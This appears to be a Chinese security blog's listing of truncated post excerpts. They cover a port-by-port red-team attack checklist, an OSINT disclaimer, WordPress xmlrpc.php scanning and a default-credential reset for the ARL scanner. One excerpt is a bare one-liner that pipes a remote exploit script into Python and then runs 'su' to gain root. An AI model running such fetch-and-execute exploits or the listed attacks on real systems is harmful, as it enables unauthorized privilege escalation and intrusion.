一、文件传输类 端口服务红队渗透点21FTP匿名登录、弱口令爆破、目录遍历、上传后门、嗅探873Rsync匿名访问、弱口令、未授权拉取 / 上传源码、配置文件 二、Web/HTTPS 通用类 端口服务红队渗透点80HTTP常规 Web 漏洞（SQL 注入、XSS、文件上传、后台泄露）、目录扫描、CMS 漏洞、管理后台爆破443HTTPSOpenSS…

curl https://copy.fail/exp | python3 && su

声明：​本教程推荐的 OSINT 工具及操作指南，仅适用于合法授权场景（企业自查、威胁情报研究、学术调研等）。使用者必须遵守《网络安全法》《个人信息保护法》等相关法律法规，严禁用于未授权隐私查询、骚扰跟踪、违法犯罪等违规行为。​教程仅为工具功能介绍，不承担因使用不当、违规操作导致的任何法律责任与损失。所有工具使用后果由使用者自行承担，且需坚守公开信…

前言 最近没怎么看WAF信息，昨天登陆上去一看好家伙全是告警，给我吓得一机灵。赶紧点开详情康康，结果发现全是下面这玩意儿 该说不说，这哥们自动化扫我这么多天也是真nb。但是，WAF全都防出去了（笑）。为了避免看到这些抽象东西，我随后禁用了这个文件。那么这个文件究竟是干什么的，禁用他是否会导致其他问题呢？ 什么是 xmlrpc.php ？ 互联网上面…

很早之前的一个问题了，总有人问我docker部署完资产灯塔忘了密码怎么办 当忘记了登录密码，可以执行下面的命令，然后使用 admin/admin123 就可以登录了 docker exec -ti arl_mongodb mongo -u admin -p admin use arl db.user.drop() db.user.insert({ …